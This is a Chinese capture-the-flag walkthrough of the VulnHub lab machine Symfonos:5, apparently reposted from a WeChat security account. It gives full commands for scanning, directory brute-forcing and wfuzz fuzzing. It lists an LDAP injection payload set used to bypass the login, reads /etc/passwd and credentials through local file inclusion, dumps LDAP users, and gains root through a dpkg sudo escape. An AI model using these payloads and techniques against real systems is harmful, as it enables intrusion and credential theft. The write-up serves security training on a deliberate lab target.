OSCP难度靶机之Symfonos:5

admin 2025年2月25日19:20:40评论6 views字数 1375阅读4分35秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-5,415/

虚拟机简介:初学者基于现实生活的机器,旨在教人们从内部理解的重要性。

目标:1个flag

级别:初级

1、主机探测

1、通过netdiscover检测主机IP地址

netdiscover -r 192.168.207.0/24

OSCP难度靶机之Symfonos:5

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.145

查看开放22、80、389、636端口

OSCP难度靶机之Symfonos:5

3、渗透测试

3.1 HTTP服务探测

1.使用dirb进行服务探测

dirb http://192.168.207.140

探测到有admin登录页面

OSCP难度靶机之Symfonos:5

2.目录爆破

gobuster dir -u http://192.168.207.140  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f

OSCP难度靶机之Symfonos:5

3.访问页面存在登录页面

OSCP难度靶机之Symfonos:5

4.使用SQL注入爆破

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "http://192.168.207.140/admin.php?username=FUZZ&password=FUZZ"

未成功

OSCP难度靶机之Symfonos:5

5.使用ldap爆破

wfuzz -c -z file,ldap.txt -u "http://192.168.207.140/admin.php?username=FUZZ&password=pwd"

字典内容如下

*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

查看可以通过*))%00爆破成功

OSCP难度靶机之Symfonos:5

6.成功登录网站后台

OSCP难度靶机之Symfonos:5

3.2 站点测试

1.查看网页源代码

可能存在本地文件包含

OSCP难度靶机之Symfonos:5

2.尝试读取本地文件

http://192.168.207.140/home.php?url=/etc/passwd

成功读取本地文件

OSCP难度靶机之Symfonos:5

3.读取本地文件

http://192.168.207.140/home.php?url=admin.php

在网页源代码中查看获取到LDAP连接用户名和密码

OSCP难度靶机之Symfonos:5

4.使用ldap查找

ldapsearch -x -LLL -h 192.168.207.140 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'

查看到用户名为:zeus,密码为:Y2V0a0tmNHdDdUhDOUZFVA==,解码后为:cetkKf4wCuHC9FET

OSCP难度靶机之Symfonos:5

OSCP难度靶机之Symfonos:5

5.使用账号登录SSH

ssh [email protected]

OSCP难度靶机之Symfonos:5

3.3 系统提权

1.查看sudo权限

sudo -l

查看存在dpkg提权

OSCP难度靶机之Symfonos:5

2.执行提权命令

sudo dpkg -l

并输入!/bin/bash

OSCP难度靶机之Symfonos:5

3.已经提权成功

OSCP难度靶机之Symfonos:5

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:5

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月25日19:20:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Symfonos:5https://cn-sec.com/archives/844858.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息